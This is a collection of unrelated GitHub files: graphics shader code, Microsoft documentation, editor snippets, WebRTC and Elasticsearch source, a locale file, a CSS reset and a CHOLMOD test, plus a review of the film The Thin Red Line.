    //z.x += 0.5;
    //z *= 4.0;
    gl_Position = modelview * vec4(z, 0, 1);
    }
    `,
    // Fragment shader: combines a viridis pressure colormap with
    // wireframe-style streamline, grid, and boundary overlays.
    frag: glsl(`
    #extension GL_OES_standard_derivatives : enable
    precision highp float;
    #pragma glslify: colormap = require(glsl-colormap/viridis)
    varying float psi, cp, rgrid;
    varying vec2 uv, xy;
    uniform float cpAlpha, streamAlpha, gridAlpha;
    uniform vec2 mu;
    #pragma glslify: grid = require(glsl-solid-wireframe/cartesian/scaled)
    const float feather = 1.0;
    const float streamWidth = 0.75;
    const float pressureWidth = 0.75;
    const float boundaryWidth = 3.0;
    void main () {
    float boundary = grid(rgrid, boundaryWidth, feather);
    float pressure = 1.0 - (1.0 - grid(cp * 20.0, pressureWidth, feather)) * cpAlpha;
    float stream = ((1.0 - grid(1.5 * psi, streamWidth, feather)) + 0.4 * (1.0 - grid(15.0 * psi, streamWidth, feather))) * streamAlpha;
    vec3 color = colormap(max(0.0, min(1.0, cp))).xyz;
    float gridLines = ((1.0 - grid(xy, 0.75, feather)) + 0.4 * (1.0 - grid(xy * 10.0, 0.75, feather))) * gridAlpha;
    color *= 1.0 - gridLines;
    gl_FragColor = vec4((color * pressure + stream) * boundary, 1);
    }
    `),
    attributes: {
      rth: mesh.positions,
      //barycentric: mesh.barycentric,
    },
    // Depth testing is unnecessary for a single flat 2D mesh.
    depth: {
      enable: false
    },
    elements: mesh.cells,
    count: mesh.cells.length * 3
  });
};
| {
"pile_set_name": "Github"
} |
---
title: La instrucción 'Option <specifier>' solo puede aparecer una vez en cada archivo
ms.date: 07/20/2015
f1_keywords:
- bc30225
- vbc30225
helpviewer_keywords:
- BC30225
ms.assetid: 56970b37-7262-4a8f-ac01-2bb2cc8503de
ms.openlocfilehash: 616470f89d7676143c3c429efaa02cf63f72fd60
ms.sourcegitcommit: bf5c5850654187705bc94cc40ebfb62fe346ab02
ms.translationtype: MT
ms.contentlocale: es-ES
ms.lasthandoff: 09/23/2020
ms.locfileid: "91089876"
---
# <a name="option-specifier-statement-can-only-appear-once-per-file"></a>La instrucción 'Option \<specifier>' solo puede aparecer una vez en cada archivo
Las instrucciones `Option Compare`, `Option Explicit`y `Option Strict` solo pueden usarse una vez cada una en el mismo archivo de origen.
**Identificador de error:** BC30225
## <a name="to-correct-this-error"></a>Para corregir este error
- Quite la instrucción `Option` duplicada.
## <a name="see-also"></a>Vea también
- [Option ( \<keyword> instrucción)](../language-reference/statements/option-keyword-statement.md)
- [Option Compare (instrucción)](../language-reference/statements/option-compare-statement.md)
- [Option Explicit (instrucción)](../language-reference/statements/option-explicit-statement.md)
- [Option Strict (instrucción)](../language-reference/statements/option-strict-statement.md)
| {
"pile_set_name": "Github"
} |
ace.define("ace/snippets/vala",["require","exports","module"], function(require, exports, module) {
"use strict";
exports.snippets = [
{
"content": "case ${1:condition}:\n\t$0\n\tbreak;\n",
"name": "case",
"scope": "vala",
"tabTrigger": "case"
},
{
"content": "/**\n * ${6}\n */\n${1:public} class ${2:MethodName}${3: : GLib.Object} {\n\n\t/**\n\t * ${7}\n\t */\n\tpublic ${2}(${4}) {\n\t\t${5}\n\t}\n\n\t$0\n}",
"name": "class",
"scope": "vala",
"tabTrigger": "class"
},
{
"content": "(${1}) => {\n\t${0}\n}\n",
"name": "closure",
"scope": "vala",
"tabTrigger": "=>"
},
{
"content": "/*\n * $0\n */",
"name": "Comment (multiline)",
"scope": "vala",
"tabTrigger": "/*"
},
{
"content": "Console.WriteLine($1);\n$0",
"name": "Console.WriteLine (writeline)",
"scope": "vala",
"tabTrigger": "writeline"
},
{
"content": "[DBus(name = \"$0\")]",
"name": "DBus annotation",
"scope": "vala",
"tabTrigger": "[DBus"
},
{
"content": "delegate ${1:void} ${2:DelegateName}($0);",
"name": "delegate",
"scope": "vala",
"tabTrigger": "delegate"
},
{
"content": "do {\n\t$0\n} while ($1);\n",
"name": "do while",
"scope": "vala",
"tabTrigger": "dowhile"
},
{
"content": "/**\n * $0\n */",
"name": "DocBlock",
"scope": "vala",
"tabTrigger": "/**"
},
{
"content": "else if ($1) {\n\t$0\n}\n",
"name": "else if (elseif)",
"scope": "vala",
"tabTrigger": "elseif"
},
{
"content": "else {\n\t$0\n}",
"name": "else",
"scope": "vala",
"tabTrigger": "else"
},
{
"content": "enum {$1:EnumName} {\n\t$0\n}",
"name": "enum",
"scope": "vala",
"tabTrigger": "enum"
},
{
"content": "public errordomain ${1:Error} {\n\t$0\n}",
"name": "error domain",
"scope": "vala",
"tabTrigger": "errordomain"
},
{
"content": "for ($1;$2;$3) {\n\t$0\n}",
"name": "for",
"scope": "vala",
"tabTrigger": "for"
},
{
"content": "foreach ($1 in $2) {\n\t$0\n}",
"name": "foreach",
"scope": "vala",
"tabTrigger": "foreach"
},
{
"content": "Gee.ArrayList<${1:G}>($0);",
"name": "Gee.ArrayList",
"scope": "vala",
"tabTrigger": "ArrayList"
},
{
"content": "Gee.HashMap<${1:K},${2:V}>($0);",
"name": "Gee.HashMap",
"scope": "vala",
"tabTrigger": "HashMap"
},
{
"content": "Gee.HashSet<${1:G}>($0);",
"name": "Gee.HashSet",
"scope": "vala",
"tabTrigger": "HashSet"
},
{
"content": "if ($1) {\n\t$0\n}",
"name": "if",
"scope": "vala",
"tabTrigger": "if"
},
{
"content": "interface ${1:InterfaceName}{$2: : SuperInterface} {\n\t$0\n}",
"name": "interface",
"scope": "vala",
"tabTrigger": "interface"
},
{
"content": "public static int main(string [] argv) {\n\t${0}\n\treturn 0;\n}",
"name": "Main function",
"scope": "vala",
"tabTrigger": "main"
},
{
"content": "namespace $1 {\n\t$0\n}\n",
"name": "namespace (ns)",
"scope": "vala",
"tabTrigger": "ns"
},
{
"content": "stdout.printf($0);",
"name": "printf",
"scope": "vala",
"tabTrigger": "printf"
},
{
"content": "${1:public} ${2:Type} ${3:Name} {\n\tset {\n\t\t$0\n\t}\n\tget {\n\n\t}\n}",
"name": "property (prop)",
"scope": "vala",
"tabTrigger": "prop"
},
{
"content": "${1:public} ${2:Type} ${3:Name} {\n\tget {\n\t\t$0\n\t}\n}",
"name": "read-only property (roprop)",
"scope": "vala",
"tabTrigger": "roprop"
},
{
"content": "@\"${1:\\$var}\"",
"name": "String template (@)",
"scope": "vala",
"tabTrigger": "@"
},
{
"content": "struct ${1:StructName} {\n\t$0\n}",
"name": "struct",
"scope": "vala",
"tabTrigger": "struct"
},
{
"content": "switch ($1) {\n\t$0\n}",
"name": "switch",
"scope": "vala",
"tabTrigger": "switch"
},
{
"content": "try {\n\t$2\n} catch (${1:Error} e) {\n\t$0\n}",
"name": "try/catch",
"scope": "vala",
"tabTrigger": "try"
},
{
"content": "\"\"\"$0\"\"\";",
"name": "Verbatim string (\"\"\")",
"scope": "vala",
"tabTrigger": "verbatim"
},
{
"content": "while ($1) {\n\t$0\n}",
"name": "while",
"scope": "vala",
"tabTrigger": "while"
}
];
exports.scope = "";
});
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<productsPages:CategoryListPageXaml
xmlns="http://xamarin.com/schemas/2014/forms"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
x:Class="XamarinCRM.Pages.Products.CategoryListPage"
xmlns:productsPages="clr-namespace:XamarinCRM.Pages.Products"
xmlns:productsViews="clr-namespace:XamarinCRM.Views.Products"
Title="{Binding Title}">
<productsViews:CategoryListView
IsPullToRefreshEnabled="True"
ItemsSource="{Binding SubCategories}"
RefreshCommand="{Binding LoadCategoriesRemoteCommand}"
IsRefreshing="{Binding IsBusy, Mode=OneWay}"
ItemTapped="CategoryItemTapped" />
</productsPages:CategoryListPageXaml>
| {
"pile_set_name": "Github"
} |
# Thin wrapper around jQuery jStorage for persisting per-post data under a
# namespaced key ("post-<id>", or "post-new" for unsaved posts).
class Storage
  # opts.id identifies the post; falls back to "new" when absent.
  constructor: (opts={}) ->
    @key = opts.id or "new"

  # Namespaced jStorage key for this instance.
  getKey: ->
    "post-#{@key}"

  # Store `data` with a TTL in milliseconds (default 30s), then notify
  # subscribers.
  put: (data, ttl = 30000) ->
    # Save it manually so the first load has data.
    $.jStorage.set @getKey(), data, ttl
    # Publish the data so any listeners can update.
    $.jStorage.publish @getKey(), data

  # Read the stored value, or `default_val` when nothing is stored.
  get: (default_val = {}) ->
    $.jStorage.get @getKey(), default_val

  # Delete the stored entry entirely.
  destroy: ->
    $.jStorage.deleteKey @getKey()
| {
"pile_set_name": "Github"
} |
# Display names for logic-related category groups (keys look like
# category ids — confirm against the consuming code).
binary_logic:
  name: Binary Logic
logic_over_data:
  name: Logic Over Data
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2011 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
#include "rtc_base/time/timestamp_extrapolator.h"
#include <algorithm>
namespace webrtc {
// Constructs the extrapolator anchored at local time |start_ms| (ms).
// The member initializers establish filter defaults; Reset() then
// (re)initializes the mutable state from |start_ms|.
TimestampExtrapolator::TimestampExtrapolator(int64_t start_ms)
    : _rwLock(RWLockWrapper::CreateRWLock()),
      _startMs(0),
      _firstTimestamp(0),
      _wrapArounds(0),
      _prevUnwrappedTimestamp(-1),
      _prevWrapTimestamp(-1),
      _lambda(1),
      _firstAfterReset(true),
      _packetCount(0),
      _startUpFilterDelayInPackets(2),
      _detectorAccumulatorPos(0),
      _detectorAccumulatorNeg(0),
      _alarmThreshold(60e3),
      _accDrift(6600),  // in timestamp ticks, i.e. 15 ms
      _accMaxError(7000),
      _pP11(1e10) {
  Reset(start_ms);
}
TimestampExtrapolator::~TimestampExtrapolator() {
  // _rwLock was heap-allocated via RWLockWrapper::CreateRWLock().
  delete _rwLock;
}
// Re-anchors the extrapolator at |start_ms|: resets the filter weights
// (_w) and covariance (_pP), clears wrap-around/packet counters and the
// CUSUM accumulators, and arms _firstAfterReset so the next Update()
// re-seeds the offset estimate.
void TimestampExtrapolator::Reset(int64_t start_ms) {
  WriteLockScoped wl(*_rwLock);
  _startMs = start_ms;
  _prevMs = _startMs;
  _firstTimestamp = 0;
  _w[0] = 90.0;  // initial slope: 90 timestamp ticks per millisecond
  _w[1] = 0;
  _pP[0][0] = 1;
  _pP[1][1] = _pP11;
  _pP[0][1] = _pP[1][0] = 0;
  _firstAfterReset = true;
  _prevUnwrappedTimestamp = -1;
  _prevWrapTimestamp = -1;
  _wrapArounds = 0;
  _packetCount = 0;
  _detectorAccumulatorPos = 0;
  _detectorAccumulatorNeg = 0;
}
// Folds one (local receive time |tMs| in ms, 90 kHz RTP timestamp
// |ts90khz|) observation into the recursive-least-squares estimate of the
// timestamp-to-local-time mapping (_w = [slope, offset], covariance _pP).
void TimestampExtrapolator::Update(int64_t tMs, uint32_t ts90khz) {
  _rwLock->AcquireLockExclusive();
  if (tMs - _prevMs > 10e3) {
    // Ten seconds without a complete frame.
    // Reset the extrapolator
    _rwLock->ReleaseLockExclusive();
    Reset(tMs);
    _rwLock->AcquireLockExclusive();
  } else {
    _prevMs = tMs;
  }

  // Remove offset to prevent badly scaled matrices
  tMs -= _startMs;

  CheckForWrapArounds(ts90khz);

  // Unwrap the 32-bit timestamp into a monotonically growing 64-bit value.
  int64_t unwrapped_ts90khz =
      static_cast<int64_t>(ts90khz) +
      _wrapArounds * ((static_cast<int64_t>(1) << 32) - 1);

  if (_firstAfterReset) {
    // Make an initial guess of the offset,
    // should be almost correct since tMs - _startMs
    // should about zero at this time.
    _w[1] = -_w[0] * tMs;
    _firstTimestamp = unwrapped_ts90khz;
    _firstAfterReset = false;
  }

  // Prediction residual: observed timestamp minus the model's prediction.
  double residual = (static_cast<double>(unwrapped_ts90khz) - _firstTimestamp) -
                    static_cast<double>(tMs) * _w[0] - _w[1];
  if (DelayChangeDetection(residual) &&
      _packetCount >= _startUpFilterDelayInPackets) {
    // A sudden change of average network delay has been detected.
    // Force the filter to adjust its offset parameter by changing
    // the offset uncertainty. Don't do this during startup.
    _pP[1][1] = _pP11;
  }

  if (_prevUnwrappedTimestamp >= 0 &&
      unwrapped_ts90khz < _prevUnwrappedTimestamp) {
    // Drop reordered frames.
    _rwLock->ReleaseLockExclusive();
    return;
  }

  // Standard RLS gain computation with forgetting factor _lambda:
  // T = [t(k) 1]';
  // that = T'*w;
  // K = P*T/(lambda + T'*P*T);
  double K[2];
  K[0] = _pP[0][0] * tMs + _pP[0][1];
  K[1] = _pP[1][0] * tMs + _pP[1][1];
  double TPT = _lambda + tMs * K[0] + K[1];
  K[0] /= TPT;
  K[1] /= TPT;
  // w = w + K*(ts(k) - that);
  _w[0] = _w[0] + K[0] * residual;
  _w[1] = _w[1] + K[1] * residual;
  // P = 1/lambda*(P - K*T'*P);
  double p00 =
      1 / _lambda * (_pP[0][0] - (K[0] * tMs * _pP[0][0] + K[0] * _pP[1][0]));
  double p01 =
      1 / _lambda * (_pP[0][1] - (K[0] * tMs * _pP[0][1] + K[0] * _pP[1][1]));
  _pP[1][0] =
      1 / _lambda * (_pP[1][0] - (K[1] * tMs * _pP[0][0] + K[1] * _pP[1][0]));
  _pP[1][1] =
      1 / _lambda * (_pP[1][1] - (K[1] * tMs * _pP[0][1] + K[1] * _pP[1][1]));
  _pP[0][0] = p00;
  _pP[0][1] = p01;
  _prevUnwrappedTimestamp = unwrapped_ts90khz;
  if (_packetCount < _startUpFilterDelayInPackets) {
    _packetCount++;
  }
  _rwLock->ReleaseLockExclusive();
}
// Maps a 90 kHz RTP timestamp to an extrapolated local time in ms using
// the current filter estimate. Returns -1 before any sample has been
// seen; during startup (fewer than _startUpFilterDelayInPackets samples)
// falls back to a simple 90-ticks-per-ms extrapolation from the previous
// sample.
int64_t TimestampExtrapolator::ExtrapolateLocalTime(uint32_t timestamp90khz) {
  ReadLockScoped rl(*_rwLock);
  int64_t localTimeMs = 0;
  CheckForWrapArounds(timestamp90khz);
  double unwrapped_ts90khz =
      static_cast<double>(timestamp90khz) +
      _wrapArounds * ((static_cast<int64_t>(1) << 32) - 1);
  if (_packetCount == 0) {
    localTimeMs = -1;
  } else if (_packetCount < _startUpFilterDelayInPackets) {
    localTimeMs =
        _prevMs +
        static_cast<int64_t>(
            static_cast<double>(unwrapped_ts90khz - _prevUnwrappedTimestamp) /
                90.0 +
            0.5);
  } else {
    if (_w[0] < 1e-3) {
      // Degenerate slope estimate; avoid dividing by ~0.
      localTimeMs = _startMs;
    } else {
      // Invert the linear model: t = (ts - ts0 - offset) / slope.
      double timestampDiff =
          unwrapped_ts90khz - static_cast<double>(_firstTimestamp);
      localTimeMs = static_cast<int64_t>(static_cast<double>(_startMs) +
                                         (timestampDiff - _w[1]) / _w[0] + 0.5);
    }
  }
  return localTimeMs;
}
// Investigates if the timestamp clock has overflowed since the last timestamp
// and keeps track of the number of wrap arounds since reset.
// NOTE(review): this mutates _wrapArounds/_prevWrapTimestamp and is also
// called from the read-locked ExtrapolateLocalTime() path — relies on the
// caller holding the appropriate lock.
void TimestampExtrapolator::CheckForWrapArounds(uint32_t ts90khz) {
  if (_prevWrapTimestamp == -1) {
    _prevWrapTimestamp = ts90khz;
    return;
  }
  if (ts90khz < _prevWrapTimestamp) {
    // This difference will probably be less than -2^31 if we have had a wrap
    // around (e.g. timestamp = 1, _previousTimestamp = 2^32 - 1). Since it is
    // casted to a Word32, it should be positive.
    if (static_cast<int32_t>(ts90khz - _prevWrapTimestamp) > 0) {
      // Forward wrap around
      _wrapArounds++;
    }
  } else {
    // This difference will probably be less than -2^31 if we have had a
    // backward wrap around. Since it is casted to a Word32, it should be
    // positive.
    if (static_cast<int32_t>(_prevWrapTimestamp - ts90khz) > 0) {
      // Backward wrap around
      _wrapArounds--;
    }
  }
  _prevWrapTimestamp = ts90khz;
}
// Two-sided CUSUM test on the prediction residual. Returns true (and
// resets both accumulators) when the drift-corrected, clamped error
// accumulates past _alarmThreshold in either direction, indicating a
// step change in network delay.
bool TimestampExtrapolator::DelayChangeDetection(double error) {
  // CUSUM detection of sudden delay changes
  error = (error > 0) ? std::min(error, _accMaxError)
                      : std::max(error, -_accMaxError);
  _detectorAccumulatorPos =
      std::max(_detectorAccumulatorPos + error - _accDrift, double{0});
  _detectorAccumulatorNeg =
      std::min(_detectorAccumulatorNeg + error + _accDrift, double{0});
  if (_detectorAccumulatorPos > _alarmThreshold ||
      _detectorAccumulatorNeg < -_alarmThreshold) {
    // Alarm
    _detectorAccumulatorPos = _detectorAccumulatorNeg = 0;
    return true;
  }
  return false;
}
} // namespace webrtc
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2017 The Weibo-Picture-Store Authors. All rights reserved.
* Use of this source code is governed by a MIT-style license that can be
* found in the LICENSE file.
*/
/* Base typography for the whole document. */
body {
    margin: 0;
    font-size: 1rem;
    font-family: "Helvetica Neue", "Segoe UI", Arial, sans-serif;
}

/* Strip default heading margins; spacing is handled by layout rules. */
h1,
h2,
h3,
h4,
h5,
h6 {
    margin-top: 0;
    margin-bottom: 0;
}

/* Unstyled lists used as layout/navigation primitives. */
ol,
ul {
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    list-style-type: none;
}

a {
    outline-style: none;
    text-decoration: none;
}

img {
    vertical-align: middle;
    border-style: none;
}

/* Form controls inherit the page font and drop focus outlines. */
button,
input,
select {
    font: inherit;
    margin: 0;
    outline-style: none;
    overflow: visible;
}

/* Textareas additionally disable manual resizing. */
textarea {
    font: inherit;
    margin: 0;
    outline-style: none;
    overflow: auto;
    resize: none;
}

table {
    border-collapse: collapse;
    border-spacing: 0;
}
"pile_set_name": "Github"
} |
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.client.transform.transforms;
import org.elasticsearch.common.ParseField;
import org.elasticsearch.common.xcontent.ConstructingObjectParser;
import org.elasticsearch.common.xcontent.ObjectParser.ValueType;
import org.elasticsearch.common.xcontent.XContentParser;
import java.io.IOException;
import java.util.Collections;
import java.util.Map;
import java.util.Objects;
import static org.elasticsearch.common.xcontent.ConstructingObjectParser.optionalConstructorArg;
/**
* Holds state of the cursors:
*
* indexer_position: the position of the indexer querying the source
* bucket_position: the position used for identifying changes
*/
public class TransformIndexerPosition {
    public static final ParseField INDEXER_POSITION = new ParseField("indexer_position");
    public static final ParseField BUCKET_POSITION = new ParseField("bucket_position");

    // Both maps are wrapped unmodifiable at construction; either may be null.
    private final Map<String, Object> indexerPosition;
    private final Map<String, Object> bucketPosition;

    @SuppressWarnings("unchecked")
    public static final ConstructingObjectParser<TransformIndexerPosition, Void> PARSER = new ConstructingObjectParser<>(
            "transform_indexer_position",
            true,
            args -> new TransformIndexerPosition((Map<String, Object>) args[0],(Map<String, Object>) args[1]));

    static {
        // Both positions are optional; parsed as order-preserving maps.
        PARSER.declareField(optionalConstructorArg(), XContentParser::mapOrdered, INDEXER_POSITION, ValueType.OBJECT);
        PARSER.declareField(optionalConstructorArg(), XContentParser::mapOrdered, BUCKET_POSITION, ValueType.OBJECT);
    }

    /**
     * @param indexerPosition position of the indexer querying the source; may be null
     * @param bucketPosition position used for identifying changes; may be null
     */
    public TransformIndexerPosition(Map<String, Object> indexerPosition, Map<String, Object> bucketPosition) {
        this.indexerPosition = indexerPosition == null ? null : Collections.unmodifiableMap(indexerPosition);
        this.bucketPosition = bucketPosition == null ? null : Collections.unmodifiableMap(bucketPosition);
    }

    /** @return unmodifiable indexer position map, or null if unset */
    public Map<String, Object> getIndexerPosition() {
        return indexerPosition;
    }

    /** @return unmodifiable bucket position map, or null if unset */
    public Map<String, Object> getBucketsPosition() {
        return bucketPosition;
    }

    @Override
    public boolean equals(Object other) {
        if (this == other) {
            return true;
        }

        if (other == null || getClass() != other.getClass()) {
            return false;
        }

        TransformIndexerPosition that = (TransformIndexerPosition) other;

        return Objects.equals(this.indexerPosition, that.indexerPosition) &&
            Objects.equals(this.bucketPosition, that.bucketPosition);
    }

    @Override
    public int hashCode() {
        return Objects.hash(indexerPosition, bucketPosition);
    }

    /**
     * Parses an instance from the given parser; IOExceptions from the
     * parser are rethrown as RuntimeException.
     */
    public static TransformIndexerPosition fromXContent(XContentParser parser) {
        try {
            return PARSER.parse(parser, null);
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}
| {
"pile_set_name": "Github"
} |
'use strict';
// AngularJS $locale bundle for Swedish (Finland), locale id "sv-fi".
// The tables below are CLDR-derived data; only the two helpers contain logic.
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};

// Number of digits after the decimal point in the string form of n.
function getDecimals(n) {
  n = n + '';
  var i = n.indexOf('.');
  return (i == -1) ? 0 : n.length - i - 1;
}

// CLDR plural-rule operands: v = count of visible fraction digits (capped at 3
// unless opt_precision is supplied), f = those fraction digits as an integer
// (the `| 0` coerces through 32-bit int, truncating toward zero).
function getVF(n, opt_precision) {
  var v = opt_precision;
  if (undefined === v) {
    v = Math.min(getDecimals(n), 3);
  }
  var base = Math.pow(10, v);
  var f = ((n * base) | 0) % base;
  return {v: v, f: f};
}

$provide.value("$locale", {
  "DATETIME_FORMATS": {
    "AMPMS": [
      "fm",
      "em"
    ],
    "DAY": [
      "s\u00f6ndag",
      "m\u00e5ndag",
      "tisdag",
      "onsdag",
      "torsdag",
      "fredag",
      "l\u00f6rdag"
    ],
    "ERANAMES": [
      "f\u00f6re Kristus",
      "efter Kristus"
    ],
    "ERAS": [
      "f.Kr.",
      "e.Kr."
    ],
    "MONTH": [
      "januari",
      "februari",
      "mars",
      "april",
      "maj",
      "juni",
      "juli",
      "augusti",
      "september",
      "oktober",
      "november",
      "december"
    ],
    "SHORTDAY": [
      "s\u00f6n",
      "m\u00e5n",
      "tis",
      "ons",
      "tors",
      "fre",
      "l\u00f6r"
    ],
    "SHORTMONTH": [
      "jan.",
      "feb.",
      "mars",
      "apr.",
      "maj",
      "juni",
      "juli",
      "aug.",
      "sep.",
      "okt.",
      "nov.",
      "dec."
    ],
    "fullDate": "EEEE'en' 'den' d:'e' MMMM y",
    "longDate": "d MMMM y",
    "medium": "d MMM y HH:mm:ss",
    "mediumDate": "d MMM y",
    "mediumTime": "HH:mm:ss",
    "short": "dd-MM-y HH:mm",
    "shortDate": "dd-MM-y",
    "shortTime": "HH:mm"
  },
  "NUMBER_FORMATS": {
    "CURRENCY_SYM": "\u20ac",
    "DECIMAL_SEP": ",",
    "GROUP_SEP": "\u00a0",
    "PATTERNS": [
      {
        "gSize": 3,
        "lgSize": 3,
        "maxFrac": 3,
        "minFrac": 0,
        "minInt": 1,
        "negPre": "-",
        "negSuf": "",
        "posPre": "",
        "posSuf": ""
      },
      {
        "gSize": 3,
        "lgSize": 3,
        "maxFrac": 2,
        "minFrac": 2,
        "minInt": 1,
        "negPre": "-",
        "negSuf": "\u00a0\u00a4",
        "posPre": "",
        "posSuf": "\u00a0\u00a4"
      }
    ]
  },
  "id": "sv-fi",
  // CLDR Swedish plural rule: ONE when the number is exactly the integer 1.
  "pluralCat": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}
});
}]);
| {
"pile_set_name": "Github"
} |
what i look for in a movie is not necessarily perfection .
sometimes a movie has such strong ideas that despite whatever flaws it may have , i will prefer it to a better-made film that is not as thought-provoking .
the thin red line is flawed but it provokes .
terence malick returns to filmmaking 20 years after days of heaven and produces this meditative look at war .
unlike this year's saving private ryan , which dwells on war as a necessary evil and explores the moral ambiguities thereof , the thin red line simply says war is waste .
while that might seem obvious to some , only after experiencing the film do you realize how profound a waste it is .
saving private ryan has an underlying and practical acceptance that war will occur and it has a great cost ; the thin red line says idealistically avoid this at all costs .
one message is not necessarily more correct than the other .
it just depends on one's point of view .
in malick's film , war is set in a tropical paradise , and john toll's cinematography is beyond lush .
the setting poses the question , why are we fighting in the face of such beauty ?
in saving private ryan , the capture of a german soldier presents the moral quandary of whether to let him go .
in the thin red line , the japanese present the moral quandary of war in the first place .
they are just like the americans -- frightened and angry , grieving and praying .
all that separates them is war .
the flaw in the thin red line comes in the voice-overs .
unbelievable as coming from the characters and sometimes pretentious , sometimes corny , the voice-overs tell us what the images before us already do and are completely unnecessary .
dispensing with them , malick could have achieved a tarkovskian grandeur .
instead , he gets distracting self-consciousness .
aside from that , malick's direction is stunning .
the tracking shots across windswept hills and around transports speeding toward shore are extraordinary .
sean penn , elias koteas , and nick nolte give the best performances .
penn is subtle as a sergeant trying to hide his humanism , koteas is genuine as a compassionate captain , and nolte startling as a colonel whose blood vessels are about to burst if he cannot win his battle .
john travolta and george clooney are the worst in cameo roles .
ultimately however , the thin red line's interest is not in the characters and it is not in drama .
it has been frequently criticized for its lack of dramatic structure , but malick clearly has different things on his mind .
has no one ever thought that getting dramatic entertainment from war is exploitative ?
what malick is working with is theme , and in that , the thin red line is most provoking .
| {
"pile_set_name": "Github"
} |
/* ========================================================================== */
/* === Tcov/amdtest ========================================================= */
/* ========================================================================== */
/* -----------------------------------------------------------------------------
* CHOLMOD/Tcov Module. Copyright (C) 2005-2006, Timothy A. Davis
* The CHOLMOD/Tcov Module is licensed under Version 2.0 of the GNU
* General Public License. See gpl.txt for a text of the license.
* CHOLMOD is also available under other licenses; contact authors for details.
* http://www.suitesparse.com
* -------------------------------------------------------------------------- */
/* Test for amd v2.0 */
#include "cm.h"
#include "amd.h"
/* ========================================================================== */
/* === amdtest ============================================================== */
/* ========================================================================== */
/* Exercise AMD v2.x (AMD_order, AMD_2, AMD_valid, AMD_preprocess) on the
 * pattern of A (or of A*A' when A is unsymmetric/rectangular), including
 * parameter variations, deliberately-invalid inputs, and out-of-memory
 * trials.  A may be NULL, in which case nothing is done. */
void amdtest (cholmod_sparse *A)
{
    double Control [AMD_CONTROL], Info [AMD_INFO], alpha ;
    Int *P, *Cp, *Ci, *Sp, *Si, *Bp, *Bi, *Ep, *Ei, *Fp, *Fi,
        *Len, *Nv, *Next, *Head, *Elen, *Deg, *Wi, *W, *Flag ;
    cholmod_sparse *C, *B, *S, *E, *F ;
    Int i, j, n, nrow, ncol, ok, cnz, bnz, p, trial, sorted ;

    /* ---------------------------------------------------------------------- */
    /* get inputs */
    /* ---------------------------------------------------------------------- */

    printf ("\nAMD test\n") ;

    if (A == NULL)
    {
        return ;
    }

    /* B is a symmetric pattern: a copy of A when A is symmetric, else A*A' */
    if (A->stype)
    {
        B = CHOLMOD(copy) (A, 0, 0, cm) ;
    }
    else
    {
        B = CHOLMOD(aat) (A, NULL, 0, 0, cm) ;
    }

    if (A->nrow != A->ncol)
    {
        F = CHOLMOD(copy_sparse) (B, cm) ;
        OK (F->nrow == F->ncol) ;
        CHOLMOD(sort) (F, cm) ;
    }
    else
    {
        /* A is square and unsymmetric, and may have entries in A+A' that
         * are not in A */
        F = CHOLMOD(copy_sparse) (A, cm) ;
        CHOLMOD(sort) (F, cm) ;
    }

    C = CHOLMOD(copy_sparse) (B, cm) ;

    nrow = C->nrow ;
    ncol = C->ncol ;
    n = nrow ;
    OK (nrow == ncol) ;

    Cp = C->p ;
    Ci = C->i ;

    Bp = B->p ;
    Bi = B->i ;

    /* ---------------------------------------------------------------------- */
    /* S = sorted form of B, using AMD_preprocess */
    /* ---------------------------------------------------------------------- */

    cnz = CHOLMOD(nnz) (C, cm) ;
    S = CHOLMOD(allocate_sparse) (n, n, cnz, TRUE, TRUE, 0, CHOLMOD_PATTERN,
        cm);
    Sp = S->p ;
    Si = S->i ;

    W = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
    Flag = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
    AMD_preprocess (n, Bp, Bi, Sp, Si, W, Flag) ;

    /* ---------------------------------------------------------------------- */
    /* allocate workspace for amd */
    /* ---------------------------------------------------------------------- */

    P = CHOLMOD(malloc) (n+1, sizeof (Int), cm) ;
    Len = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
    Nv = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
    Next = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
    Head = CHOLMOD(malloc) (n+1, sizeof (Int), cm) ;
    Elen = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
    Deg = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
    Wi = CHOLMOD(malloc) (n, sizeof (Int), cm) ;

    /* ---------------------------------------------------------------------- */

    /* run every test twice: once with C unsorted, once sorted */
    for (sorted = 0 ; sorted <= 1 ; sorted++)
    {

        if (sorted) CHOLMOD(sort) (C, cm) ;

        Cp = C->p ;
        Ci = C->i ;

        /* ------------------------------------------------------------------ */
        /* order C with AMD_order */
        /* ------------------------------------------------------------------ */

        /* the NULL calls cover the NULL-argument code paths */
        AMD_defaults (Control) ;
        AMD_defaults (NULL) ;
        AMD_control (Control) ;
        AMD_control (NULL) ;
        AMD_info (NULL) ;

        ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
        printf ("amd return value: "ID"\n", ok) ;
        AMD_info (Info) ;
